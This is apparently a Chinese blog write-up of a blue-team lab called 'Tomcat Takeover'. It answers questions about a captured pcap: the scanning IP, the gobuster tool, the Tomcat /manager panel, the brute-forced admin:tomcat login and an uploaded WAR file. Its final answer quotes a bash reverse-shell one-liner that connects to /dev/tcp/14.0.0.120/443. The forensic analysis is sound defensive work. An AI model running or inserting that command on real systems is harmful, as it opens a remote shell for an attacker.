• Tomcat Takeover


    靶场介绍

    蓝队靶场练习之Tomcat Takeover

    场景介绍

    我们的 SOC 团队在公司内部网的一台 Web 服务器上检测到可疑活动。为了更深入地了解情况,该团队捕获了网络流量进行分析。此pcap文件可能包含一系列恶意活动,这些活动已导致Apache Tomcat Web服务器的危害。我们需要进一步调查这一事件

    题目导航

    image.png

    题目一

    鉴于在 Web 服务器上检测到可疑活动,pcap 分析会显示跨不同端口的一系列请求,这表明存在潜在的扫描行为。您能否确定负责在我们的服务器上发起这些请求的源 IP 地址?
    解题:
    在我们刚打开pcap包的时候就可以看到14.0.0.120,所以我们直接对14.0.0.120进行分析
    image.png
    可以看到14.0.0.120在进行扫描,并且工具是gobuster,版本是3.6。这里可能会有师傅问为什么只关注14.0.0.120,我一般情况下都会优先关注互联网IP,本地IP会先放着。。。所以第一题的答案为

    14.0.0.120
    
    • 1

    image.png

    第二题

    根据与攻击者关联的已识别IP地址,您能否确定攻击者活动的来源城市?
    解题:
    我们根据IP查定位即可,我一般使用的工具为cip.cc
    https://www.cip.cc/
    image.png
    所以第二题答案为

    guangzhou
    
    • 1

    image.png

    第三题

    根据 pcap 分析,由于攻击者的活动扫描,检测到多个开放端口。以下哪个端口提供对 Web 服务器管理面板的访问?
    解题:
    tomcat一般情况下是默认端口居多,我们直接过滤8080进行测试
    image.png

    所以答案为

    8080
    
    • 1

    image.png

    第四题

    在我们的服务器上发现开放端口后,攻击者似乎试图枚举和发现我们 Web 服务器上的目录和文件。可以从在此枚举过程中帮助攻击者的分析中识别哪些工具?
    解题:
    这个第一题找IP的时候就知道,本题答案为

    gobuster
    
    • 1

    image.png

    第五题

    在他们努力枚举我们 Web 服务器上的目录之后,攻击者发出了许多请求,试图识别管理界面。攻击者能够发现与管理面板关联的哪个特定目录?
    解题:
    结合tomcat的知识直接就能猜到答案

    /manager
    
    • 1

    image.png

    第六题

    在访问管理面板时,攻击者尝试暴力破解登录凭据。从数据中,能否识别出攻击者成功用于授权的正确用户名和密码组合?
    解题:
    根据管理页面来进行查找
    image.png
    image.png
    解码
    image.png
    故本题答案为

    admin:tomcat
    
    • 1

    第七题

    进入管理面板后,攻击者试图上传文件以建立反向外壳。你能从捕获的数据中识别出这个恶意文件的名称吗?
    解题:
    题目说上传,我们直接查post数据包
    image.png
    image.png
    所以本题答案为

    JXQOZY.war
    
    • 1

    最后一题

    在我们的服务器上成功建立反向外壳后,攻击者旨在确保受感染机器上的持久性。从分析中,您能否确定它们计划运行的特定命令以保持其存在?
    解题:

    /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'
    
    • 1
  • 相关阅读:
    MySQL安装常见报错处理大全
    生成对抗网络 GAN——Generative Adversarial Nets
    基于SpringBoot使用MyBatisX插件
    JavaScript高级,ES6 笔记 第一天
    [Linux]如何配置定期任務腳本,並將執行結果寄到外部郵箱? (下)
    AR空间音频能力,打造沉浸式声音体验
    android 限制浏览器等应用访问某个网站
    Linux(centos)服务器10秒快速配置Java环境
    项目成本超支的主要原因以及解决方法
    mysql命令行导入csv文件,涵盖各种报错解决(亲测)
  • 原文地址:https://blog.csdn.net/m0_64583630/article/details/133314881